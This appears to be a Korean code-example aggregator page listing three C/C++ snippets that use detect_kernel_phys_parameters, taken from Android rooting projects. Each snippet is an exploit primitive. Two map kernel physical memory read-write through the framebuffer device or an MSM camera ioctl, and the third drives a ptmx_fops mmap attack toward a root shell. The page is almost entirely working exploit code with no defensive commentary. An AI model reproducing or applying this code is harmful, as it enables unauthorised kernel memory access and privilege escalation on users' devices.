C++ (Cpp) detect_kernel_phys_parameters 예제들

예제 #1

파일: fb_mem.cpp 프로젝트: Andlab/android_root

void *
fb_mem_mmap(int *fd)
{
  struct fb_fix_screeninfo info;
  void *mapped_address;

  if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
     ALOGI("This machine can not use fb_mem exploit.\n");
     return MAP_FAILED;
  }

  *fd = open(FB_DEVICE, O_RDWR);
  if (*fd < 0) {
    ALOGI("Failed to open " FB_DEVICE " due to %s\n", strerror(errno));
    return MAP_FAILED;
  }

  if (ioctl(*fd, FBIOGET_FSCREENINFO, (void *)&info) != 0) {
    ALOGI("Failed to get screen info due to %s\n", strerror(errno));
    close(*fd);

    return MAP_FAILED;
  }

  mapped_address = mmap((void *)MAPPED_BASE, (0x100000000 - kernel_phys_address),
                        PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED,
                        *fd, kernel_phys_address + info.smem_len);


  return mapped_address;
}

예제 #2

파일: msm_cameraconfig.c 프로젝트: fi01/libmsm_cameraconfig_exploit

void *
msm_cameraconfig_mmap(int *fd_video, int *fd_config)
{
  struct msm_mem_map_info args;
  void *mapped_address;

  if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
     printf("This machine can not use msm_cameraconfig exploit.\n");
     return MAP_FAILED;
  }

  *fd_video = open("/dev/video0", O_RDWR);
  if (*fd_video < 0) {
    goto error_exit;
  }

  *fd_config = open("/dev/msm_camera/config0", O_RDWR);
  if (*fd_config < 0) {
    goto error_exit;
  }

  args.cookie = kernel_phys_offset;
  args.length = KERNEL_SIZE;
  args.mem_type = MSM_MEM_MMAP;

  if (ioctl(*fd_config, MSM_CAM_IOCTL_SET_MEM_MAP_INFO, &args) < 0) {
    goto error_exit;
  }

  mapped_address = mmap((void *)MAPPED_BASE, KERNEL_SIZE, PROT_READ | PROT_WRITE,
                        MAP_SHARED, *fd_config, kernel_phys_offset);

  if (mapped_address == MAP_FAILED) {
    goto error_exit;
  }

  return mapped_address;

error_exit:
  if (*fd_config >= 0) {
    close(*fd_config);
    *fd_config = -1;
  }

  if (*fd_video >= 0) {
    close(*fd_video);
    *fd_video = -1;
  }

  return MAP_FAILED;
}

예제 #3

파일: mm.c 프로젝트: qiuqi/android_run_root_shell

bool
run_with_mmap(memory_callback_t callback)
{
  unsigned long int kernel_physical_offset;
  bool result;

  if (run_exploit_mmap(callback, &result)) {
    return result;
  }

  setup_remap_pfn_range_address();

  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    return false;
  }

  setup_ptmx_fops_mmap_address();
  if (!ptmx_fops_mmap_address) {
    printf("You need to manage to get ptmx_fops addresses.\n");
    return false;
  }

  kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (kernel_physical_offset) {
    set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
  }
  else if (!detect_kernel_phys_parameters()) {
    printf("You need to manage to get kernel_physical_offset addresses.\n");
    return false;
  }

  return attempt_exploit(ptmx_fops_mmap_address,
                         (unsigned long int)&ptmx_mmap, 0,
			 run_callback_with_mmap, callback);
}